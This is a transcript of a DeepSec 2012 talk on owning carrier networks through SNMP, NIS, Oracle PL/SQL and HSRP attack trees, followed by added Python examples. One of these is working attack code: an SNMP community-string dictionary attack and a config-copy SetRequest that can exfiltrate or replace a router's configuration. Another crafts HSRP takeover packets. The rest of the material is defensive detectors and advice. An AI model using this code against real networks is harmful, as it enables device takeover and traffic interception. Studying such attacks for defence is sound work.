Transcript of DeepSec 2012 Own the Network – Own the Data
www.dynetics.com
Information Engineering Solutions
DeepSec 2012
Own the Network – Own the Data Paul Coggin
Internetwork Consulting Solutions Architect [email protected]
UNCLASSIFIED
V100230_Faint
Introduction
• Network Security Architect, 18 years experience
• BS Math, MS Computer Information Systems, graduate studies in IA & Security
• Certifications: Cisco, ISC^2, EC-Council
• Cisco and EC-Council instructor
• Utilities, telecommunications and service provider experience
  - Transport: Optical (DWDM, SONET), MPLS, 10G Ethernet
  - Triple Play services: Voice, IPTV
  - OSS and network management
  - Access networks: HFC cable, DSL, FTTX, wireless, ATM, Frame Relay
  - Security: penetration testing, network security architecture, vulnerability analysis
  - Routing and switching
Next Generation Network Architecture
[Diagram. Customer premises (Residential, Telecommuter, SOHO, Branch Office, Enterprise, Energy Distribution, Water / Sewer Treatment Plant, ICS / SCADA, Smart Grid, Cell Tower) connect over a DSL or Fiber Edge (CE, DSL, Hub & Spoke SONET/SDH ring) to the Metro Access/Aggregation Edge (U-PE / PE-AGG, GE Ring, L3VPN-PE, BRAS/ISG, SCE, DWDM), then to the Core (MPLS/IP P, Internet P, Cellular Mobile IP Backhaul). A Control/Applications/NMS layer holds Network Management, Provisioning, Assurance, Billing and Situational Awareness Servers, the Policy Server, DHCP Server, AAA Server, Lawful Intercept and the Policy & Control Plane. Application Services (Video Headend IPTV/VOD, SIP Proxy, Web server, VoIP GW) deliver Data, Voice and Video Service.]
Annotations on the diagram:
• Demand for bandwidth driving optical network growth (telcos, …)
• Triple Play and Smart Grid services
• TCP/IP wire tap insertion point
• Cellular mobile IP backhaul
• Carrier-class telco networks: 10 Gig, highly redundant, thousands of devices
• Internet to customer-premise automation
Transport Networks
IP+Optical
• IP/MPLS-based network services over DWDM
• IP services over SONET
• Legacy TDM services over SONET
• Cell tower T1 backhaul to support 3G and 4G
Management Plane
The equipment in each layer of the transport network has its own element management system, with trust relationships and interdependencies between the layers:
- Routing protocols
- In-band / out-of-band management
- Provisioning
- Control, management and data planes to secure
Cyber Attack Model

  OSI layers                        TCP/IP layer                  Attack examples
  7 Application, 6 Presentation,    Application                   Malware; OS- and application-level remote and
  5 Session                                                       privilege-escalation exploits; bots; phishing
  4 Transport                       Transport                     Session hijacking and spoofing (intercept, modify,
                                                                  bypass network security); DoS
  3 Network, 2 Data Link            Internet, Network Interface   MITM (intercept, modify); DoS; RF (jam, replay)
  1 Physical                        Network Interface             RF, fiber, copper media
IP Transport Cyber Attack Vectors
• Network and system architecture: centralized, distributed, redundant; physical and logical
• Transport network: RF, fiber, copper
• Network protocols: routing, switching, redundancy; apps, client/server
• Client/server architecture: HW, SW, apps, RDBMS; open source and commercial
• Trust relationships: network management and network devices; billing, middleware, provisioning
• Common HW/SW configuration settings
Transport Network Infrastructure Cyber Attack Tree
Attack vectors: deny, disrupt, delay, intercept, exploit; man-in-the-middle attacks (MITM); network protocols; IP spoofing; apps / RDBMS / NetMgt; traffic analysis.
Network infrastructure attack vectors (each branch ends in "Own Network Infrastructure"):
• SNMP
  - SNMP community string dictionary attack, with source-address spoofing, to download the router/switch configuration
  - Build a new router configuration file to enable further privilege escalation
  - Upload the new configuration file using the compromised SNMP RW string
• UNIX NetMgt server running NIS v1
  - ypcat -d <domain> -h <server IP> passwd to grab the password hashes
  - Crack passwords
  - Access the server directly; exploit the ACL trust relationship; attack SNMP/Telnet/SSH
  - Find NetMgt passwords and SNMP config files; discover backup HW configs; crack passwords
• HP OpenView server
  - Enumerate the Oracle TNS listener to identify default SIDs
  - Further enumerate SIDs to identify default DBA/system-level accounts and passwords; log in to the Oracle DB with the discovered DBA privileged account; run Oracle SQL commands; execute OS commands; add a new privileged OS account; use it to escalate privileged access to the network
  - Or: further enumerate SIDs to identify user accounts; perform a dictionary attack; crack passwords; run Oracle SQL commands; execute OS commands from Oracle PL/SQL; attack the network from the DB; find NetMgt passwords, SNMP info and OS password files
• Network management application
  - Attempt to log in using the default login/password; reconfigure a router or switch
• MITM ARP poisoning
  - Sniffing: capture SNMP community strings, unencrypted logins/passwords and protocol passwords; configure the device for further privilege escalation
• Telnet/SSH dictionary attack against routers, switches and the NetMgt server
  - Inject new routes or bogus protocol packets; configure the device for further privilege escalation
What Can You Do With a Router or Switch?
• Inject route prefixes to hide the source of an attack, or enable a more complex MITM attack by crafting routing protocol packets
• Configure route maps to forward traffic based on ACL criteria
• Lawful Intercept: forward a copy of interesting traffic using CISCO-TAP-MIB, CISCO-TAP2-MIB, CISCO-IP-TAP-MIB
• SPAN ports (port mirroring) to enhance packet capture capability
• Review routing tables to identify key targets
• DoS or MITM by crafting HSRP, routing protocol, or spanning-tree packets
• Configure a router to be a DHCP server to create a MITM attack vector
Example Cyber Attack Exploiting Trust Relationship
Reconnaissance: identified two target subnets and discovered products in use with known vulnerabilities *
• Social networking and career sites
• IP "whois" information
• Search engines
• Operating system version detection
• Port scanning
• Ping sweeps
Scans against common ports from outside the corporate network were used to narrow down targets of interest.
* An employee's resume on the LinkedIn social networking site referenced training in specific product technologies.
First subnet – directory traversal exploit
• Installed a web-based shell prompt to execute commands without a log trail
• Enumerated the internal network and services on 2000 hosts
Network Information Services (NIS)
• After discovering NIS, the ypcat command was executed
• Dumped a list of all usernames and password hashes on the system
Second subnet – firewall
• The HTTPS management interface for the firewalls was accessible from the public Internet
• Brute-force password cracking could have compromised the system (not performed)
Oracle
• Oracle is commonly used with HP OpenView for inventory management
• Default user accounts/passwords enabled and/or weak passwords are typically found
• An unsecured RDBMS is as good a foothold as an unpatched MS NT 4.0 server
• Open TNS listener / SQL*Net listener
• The RDBMS can be used for executing OS shell commands
• How about using the database and PL/SQL to attack the network?
The network infrastructure ACLs trust the network management server IP address.
Oracle Username Password Enumeration
Oracle Password Dictionary Attack
Run OS Commands From Oracle PL/SQL
Example of a Network Exploit Using Oracle PL/SQL
• Run the SNMPWALK utility against a Cisco IOS device using the SNMP read-only community string
• Cisco routers and switches running IOS 12.0 through 12.1 have a known vulnerability: if you know the unprivileged read-only SNMP community string, you can obtain the privileged read/write string
• TFTP upload of SNMPWALK to the database server using Oracle PL/SQL
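The SNMP branch of the attack tree (dictionary attack on the community string, then pulling the device configuration and pushing a new one with the RW string) and the read-only-to-read-write step on this slide, worked through in Python as an added example. This is not the talk's own tooling: the BER encoder/decoder is hand-written to keep the block dependency-free, and the target address, wordlist, TFTP server address and file name are assumed sample values.

```python
"""Minimal SNMPv2c BER encode/decode, a community-string dictionary probe, and the
CISCO-CONFIG-COPY-MIB SetRequest that makes an IOS device TFTP out its running-config.
Added example, not the talk's tooling; target, wordlist, TFTP server are sample values."""
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"        # sysDescr.0: readable with any RO community
CC = "1.3.6.1.4.1.9.9.96.1.1.1.1"      # ccCopyEntry columns (CISCO-CONFIG-COPY-MIB)
GET_REQUEST, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA2, 0xA3
NULL = b"\x05\x00"                     # BER NULL, the value placeholder in a Get

def tlv(tag, content):
    """BER tag-length-value; long-form length once content reaches 128 bytes."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(body)]) + body + content

def ber_int(value):
    return tlv(0x02, value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True))

def ber_oid(oid):
    arcs = [int(a) for a in oid.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:                 # base 128, high bit on every byte but the last
        chunk = [arc & 0x7F]
        while arc >> 7:
            arc >>= 7
            chunk.append(0x80 | (arc & 0x7F))
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))

def encode_snmp(community, pdu_tag, request_id, varbinds):
    """varbinds: (oid, BER-encoded value; NULL for a Get). Version 1 means v2c."""
    vbl = tlv(0x30, b"".join(tlv(0x30, ber_oid(o) + v) for o, v in varbinds))
    pdu = tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + vbl)
    return tlv(0x30, ber_int(1) + tlv(0x04, community.encode()) + pdu)

def ber_decode(data, pos=0):
    """Return (tag, content, position just after this TLV)."""
    tag, ln, pos = data[pos], data[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + ln], pos + ln

def decode_oid(content):
    arcs, val = [content[0] // 40, content[0] % 40], 0
    for b in content[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def parse_response(data):
    """Parse a GetResponse (None for anything else). Agents stay silent on a wrong
    community, so any well-formed response already proves the string is valid."""
    tag, msg, _ = ber_decode(data)
    if tag != 0x30:
        return None
    _, _, p = ber_decode(msg)                          # version
    _, community, p = ber_decode(msg, p)
    pdu_tag, pdu, _ = ber_decode(msg, p)
    if pdu_tag != GET_RESPONSE:
        return None
    _, rid, p = ber_decode(pdu)
    _, err, p = ber_decode(pdu, p)
    _, _, p = ber_decode(pdu, p)                       # error-index
    _, vbl, _ = ber_decode(pdu, p)
    binds, p = [], 0
    while p < len(vbl):
        _, vb, p = ber_decode(vbl, p)
        _, oid, q = ber_decode(vb)
        vtag, val, _ = ber_decode(vb, q)
        binds.append((decode_oid(oid), vtag, val))
    return {"community": community.decode(errors="replace"),
            "request_id": int.from_bytes(rid, "big", signed=True),
            "error_status": int.from_bytes(err, "big", signed=True), "varbinds": binds}

def community_dictionary_attack(target, wordlist, timeout=1.0):
    """Attack-tree step 1: Get sysDescr.0 with each candidate community and keep the
    ones that answer. Sends real UDP/161 traffic, so authorised targets only."""
    valid = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for rid, community in enumerate(wordlist, start=1):
            s.sendto(encode_snmp(community, GET_REQUEST, rid, [(SYS_DESCR, NULL)]), (target, 161))
            try:
                r = parse_response(s.recvfrom(4096)[0])
            except socket.timeout:
                continue
            if r and r["request_id"] == rid and r["error_status"] == 0:
                valid.append(community)
    return valid

def encode_config_copy(rw_community, tftp_server, filename, row=111, request_id=1):
    """Step 2, needs the RW string: one SetRequest creates a ccCopyEntry row (protocol
    tftp=1, source runningConfig=4, destination networkFile=1, rowStatus createAndGo=4)
    and the device uploads its running-config to tftp_server. Swapping the source and
    destination file types pushes an attacker-built config back the same way."""
    return encode_snmp(rw_community, SET_REQUEST, request_id, [
        (f"{CC}.2.{row}", ber_int(1)), (f"{CC}.3.{row}", ber_int(4)),
        (f"{CC}.4.{row}", ber_int(1)),
        (f"{CC}.5.{row}", tlv(0x40, socket.inet_aton(tftp_server))),   # IpAddress type
        (f"{CC}.6.{row}", tlv(0x04, filename.encode())),
        (f"{CC}.14.{row}", ber_int(4))])
```

`community_dictionary_attack("192.0.2.1", ["public", "private", "cisco"])` returns the strings the device answered; `encode_config_copy("private", "192.0.2.10", "rtr1.cfg")` is the datagram to send to UDP/161 once a RW string is known. A Get cannot tell RO from RW: that only shows when a Set is attempted, where a RO community is refused with an error status or silently dropped. The defensive corollary of the branch is the same either way: SNMPv3 or, at minimum, community strings that are not dictionary words, bound to an ACL that permits only the management servers.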
PL/SQL Query – SNMPWALK Results
Callout: SNMP Read/Write Community String
HSRP MITM – Packet Analysis
Callout: HSRP password in clear text
HSRP MITM – Packet Crafting
[Diagram: two routers sharing a virtual gateway; a rogue insider on the same LAN sends a crafted HSRP Coup packet with a higher priority than the active router.]
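The two HSRP slides (the clear-text password in the packet analysis, and the crafted Coup with a higher priority) worked through in Python as an added example, not tooling from the talk. It builds and parses the 20-byte HSRPv1 payload from RFC 2281, and runs a small detector over a constructed capture; the router addresses, priorities and the "cisco" password are sample values.

```python
"""HSRPv1 (RFC 2281) crafting, parsing and takeover detection. Added example, not
tooling from the talk; addresses, priorities and the "cisco" password are sample values."""
import socket
import struct

HSRP_FMT = "!BBBBBBBB8s4s"         # 20-byte payload, sent in UDP/1985 to 224.0.0.2 with TTL 1
HELLO, COUP, RESIGN = 0, 1, 2      # opcodes
SPEAK, STANDBY, ACTIVE = 4, 8, 16  # states
DEFAULT_AUTH = b"cisco"            # IOS default; travels in clear text, NUL-padded to 8 bytes

def build_hsrp(opcode, state, priority, group, vip, auth=DEFAULT_AUTH, hellotime=3, holdtime=10):
    """Version byte is 0 for HSRPv1. A Coup whose priority beats the active router's
    (255 beats everything) is honoured as long as the auth field matches what the
    routers were configured with, which is why the sniffed password matters."""
    return struct.pack(HSRP_FMT, 0, opcode, state, hellotime, holdtime, priority,
                       group, 0, auth.ljust(8, b"\x00"), socket.inet_aton(vip))

def parse_hsrp(payload):
    (ver, opcode, state, hello, hold, prio, group, _res,
     auth, vip) = struct.unpack(HSRP_FMT, payload[:20])
    return {"version": ver, "opcode": opcode, "state": state, "hellotime": hello,
            "holdtime": hold, "priority": prio, "group": group,
            "auth": auth.rstrip(b"\x00").decode(errors="replace"),   # the sniffable password
            "vip": socket.inet_ntoa(vip)}

def detect_hsrp_takeover(packets):
    """Learn the active router per group from Active-state Hellos, then alert when a
    different source sends a Coup (or claims Active) with a higher priority.
    packets: (source IP, HSRP payload) pairs in capture order."""
    active, seen, alerts = {}, set(), []
    for src, raw in packets:
        h = parse_hsrp(raw)
        g, prio = h["group"], h["priority"]
        hello_active = h["opcode"] == HELLO and h["state"] == ACTIVE
        claims = h["opcode"] == COUP or hello_active
        if claims and g in active and src != active[g][0] and prio > active[g][1]:
            if (g, src) not in seen:
                seen.add((g, src))
                alerts.append(f"group {g}: {src} (priority {prio}) is taking over from "
                              f"{active[g][0]} (priority {active[g][1]}); auth={h['auth']!r}")
        elif hello_active and g not in active:
            active[g] = (src, prio)      # first Active Hello seen becomes the baseline
    return alerts

# Constructed capture: two legitimate routers, then a rogue host on the same LAN.
SAMPLE_CAPTURE = [
    ("10.0.0.2", build_hsrp(HELLO, ACTIVE, 100, 1, "10.0.0.1")),
    ("10.0.0.3", build_hsrp(HELLO, STANDBY, 90, 1, "10.0.0.1")),
    ("10.0.0.2", build_hsrp(HELLO, ACTIVE, 100, 1, "10.0.0.1")),
    ("10.0.0.66", build_hsrp(COUP, SPEAK, 255, 1, "10.0.0.1")),   # the coup from the slide
    ("10.0.0.66", build_hsrp(HELLO, ACTIVE, 255, 1, "10.0.0.1")),
]

if __name__ == "__main__":
    for line in detect_hsrp_takeover(SAMPLE_CAPTURE):
        print(line)
```

Bytes 8 to 15 of every packet are the password, which is all the "HSRP Password Clear Text" callout is pointing at. The detector deliberately keys on source address rather than on the auth field, because the rogue copies the correct password; in production it would be fed from a SPAN port on the gateway VLAN, and the configuration fix is MD5 authentication on the standby group plus a higher priority and preemption on the real routers.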
Instrumentation
Secure Visualization and Instrumentation (SVI) enables network forensics, root-cause troubleshooting and analysis.
Incident Response Network Forensics using SVI – Case #1
[Diagram: example carrier-class network. A residential customer (PC, TV, IP phone, STB) sits behind a DSL CPE and IP DSLAM, then multiple routers / service gateways; services are separated by VLANs and private virtual circuits for Internet, IPTV & radio, video on demand and voice. SVI provides deep inspection and monitoring of network flows / packets.]
Network instrumentation is critical to security.
• A foreign IP address attacked the DSL modem.
• It changed the DNS address to a relay box ("bad guy" relay server) in the US.
• Web requests and web traffic were hijacked.
Incident Response Network Management Using SVI – Case #2
[Diagram: the same example carrier-class network as in Case #1 (residential customer behind DSL CPE and IP DSLAM, multiple routers / service gateways, service separation by VLANs and private virtual circuits).]
Protocol and logical architecture knowledge is key.
SVI: deep inspection and monitoring of network flows / packets.
• A customer employee mistakenly bridged the Data and Video networks.
• Malware existed on Data (ISP) user computers; the malware sent ICMP packets to DoS a target.
• The video equipment encapsulated the DoS packets in all multicast groups, so they were sent to all video devices / users.
• The customer's SVI alerted on unusual traffic on the video multicast VLAN.
• Remote incident analysis / forensics on the network packets showed multicasting of "bad info" and misconfiguration of the network's logical data flows.
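The two SVI cases as flow-record checks, added here as an example of the kind of rule an instrumented network can run; this is not the talk's tooling. Case #1 is caught by a residential CPE resolving DNS somewhere other than the ISP resolvers, Case #2 by ICMP aimed at a multicast group and by data-service hosts appearing on the video VLAN at all. The subnets, VLAN ids, resolver addresses and the flow lines are constructed.

```python
"""Flow-record checks for the two SVI incident cases: a DSL CPE whose DNS was pointed
at a foreign relay (Case #1) and ICMP DoS traffic from a mistakenly bridged data network
replicated into the video multicast VLAN (Case #2). Added example, not the talk's
tooling; subnets, VLAN ids, resolvers and the sample flows are constructed."""
import ipaddress
from dataclasses import dataclass
from typing import List, Tuple

ISP_RESOLVERS = {ipaddress.ip_address("10.1.1.53"), ipaddress.ip_address("10.1.2.53")}
RESIDENTIAL = ipaddress.ip_network("10.20.0.0/16")   # DSL CPE data-service addresses (assumed)
MULTICAST = ipaddress.ip_network("224.0.0.0/4")
VIDEO_VLAN = 200                                      # IPTV multicast VLAN (assumed)

# Constructed flow export, one record per line: ts,src,dst,proto,sport,dport,vlan,packets
SAMPLE_FLOWS = """\
1349250001,10.20.5.17,10.1.1.53,udp,40211,53,100,12
1349250002,10.20.5.17,203.0.113.9,udp,40212,53,100,40
1349250003,10.20.5.17,198.51.100.77,tcp,40213,80,100,300
1349250010,10.20.9.40,10.1.2.53,udp,50000,53,100,3
1349250020,10.20.7.8,239.1.1.5,icmp,0,0,200,9000
1349250021,10.20.7.9,239.1.1.5,icmp,0,0,200,8500
1349250022,10.30.0.10,239.1.1.5,udp,1234,5000,200,50000
"""

@dataclass
class Flow:
    ts: int
    src: ipaddress.IPv4Address
    dst: ipaddress.IPv4Address
    proto: str
    sport: int
    dport: int
    vlan: int
    packets: int

def parse_flows(text: str) -> List[Flow]:
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, proto, sport, dport, vlan, pkts = line.split(",")
        flows.append(Flow(int(ts), ipaddress.ip_address(src), ipaddress.ip_address(dst),
                          proto, int(sport), int(dport), int(vlan), int(pkts)))
    return flows

Alert = Tuple[str, str, str]   # (rule, src, dst)

def analyze(text: str) -> List[Alert]:
    alerts: List[Alert] = []
    for f in parse_flows(text):
        # Case 1: a residential CPE resolving through anything but the ISP resolvers
        # means its DNS setting was changed (here, to the relay box).
        if (f.src in RESIDENTIAL and f.proto == "udp" and f.dport == 53
                and f.dst not in ISP_RESOLVERS):
            alerts.append(("dns_hijack", str(f.src), str(f.dst)))
        # Case 2a: ICMP has no business going to a multicast group; the video
        # equipment replicating it to every set-top box is the DoS amplifier.
        if f.proto == "icmp" and f.dst in MULTICAST:
            alerts.append(("icmp_to_multicast", str(f.src), str(f.dst)))
        # Case 2b: data-service hosts should never be seen on the video VLAN;
        # their presence is the bridging misconfiguration itself.
        if f.vlan == VIDEO_VLAN and f.src in RESIDENTIAL:
            alerts.append(("data_host_on_video_vlan", str(f.src), str(f.dst)))
    return alerts

if __name__ == "__main__":
    for rule, src, dst in analyze(SAMPLE_FLOWS):
        print(f"{rule}: {src} -> {dst}")
```

The legitimate video source (10.30.0.10, UDP into 239.1.1.5 on the video VLAN) raises nothing, and the CPE that still uses the ISP resolvers raises nothing either; the point of the second case is that the ICMP rule and the VLAN rule fire on the same hosts, which is what tells the analyst the problem is a bridged network rather than a single infected box.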
Questions?